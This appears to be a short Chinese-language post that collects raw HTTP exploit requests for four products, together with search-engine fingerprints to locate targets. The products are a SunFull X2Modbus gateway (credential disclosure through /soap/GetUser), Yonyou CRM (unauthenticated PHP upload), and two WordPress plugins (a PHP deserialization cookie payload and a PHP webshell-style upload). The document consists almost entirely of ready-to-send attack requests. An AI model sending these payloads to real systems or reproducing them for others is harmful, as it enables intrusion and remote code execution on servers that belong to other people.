迅饶科技X2Modbus网关GetUser 信息泄露漏洞
server="SunFull-Webs"
server="SunFull-Webs"
POST /soap/GetUser HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Content-Length: 58Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencoded
<GetUser><User Name="admin" Password="admin"/></GetUser>
用友crm文件上传漏洞
app.name="用友 CRM"
/tmpfile/{{path}}.tmp.php
app.name="用友 CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------269520967239406871642430066855Content-Length: 355-----------------------------269520967239406871642430066855Content-Disposition: form-data; name="file"; filename="%s.php "Content-Type: application/octet-stream<?phpinfo();sleep(8);unlink(FILE);?>-----------------------------269520967239406871642430066855Content-Disposition: form-data; name="upload"upload-----------------------------269520967239406871642430066855--
/tmpfile/{{path}}.tmp.php
WordPress-thimpress_hotel_booking存在代码执行漏洞
GET / HTTP/1.1Host: User-Agent: Mozilla/5.0Connection: closeCookie: thimpress_hotel_booking_1=O:11:"WPHB_Logger":1:{s:21:"%00WPHB_Logger%00_handles"%3BC:33:"Requests_Utility_FilteredIterator":67:{x:i:0%3Ba:1:{i:0%3Bs:2:"-1"%3B}%3Bm:a:1:{s:11:"%00*%00callback"%3Bs:7:"phpinfo"%3B}}}Accept-Encoding: gzipWordPress-js-support-ticket存在文件上传漏洞
http://ip/wp-content/plugins/js-support-ticket/jssupportticketdata/supportImg/{{rand8}}.php
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1Host: Content-Type: multipart/form-data; boundary=--------767099171User-Agent: Mozilla/5.0 ----------767099171Content-Disposition: form-data; name="action"configuration_saveconfiguration----------767099171Content-Disposition: form-data; name="form_request"jssupportticket----------767099171Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"Content-Type: image/png<?php echo md5(123);unlink(__FILE__);?>----------767099171-- http://ip/wp-content/plugins/js-support-ticket/jssupportticketdata/supportImg/{{rand8}}.php
👍2❤1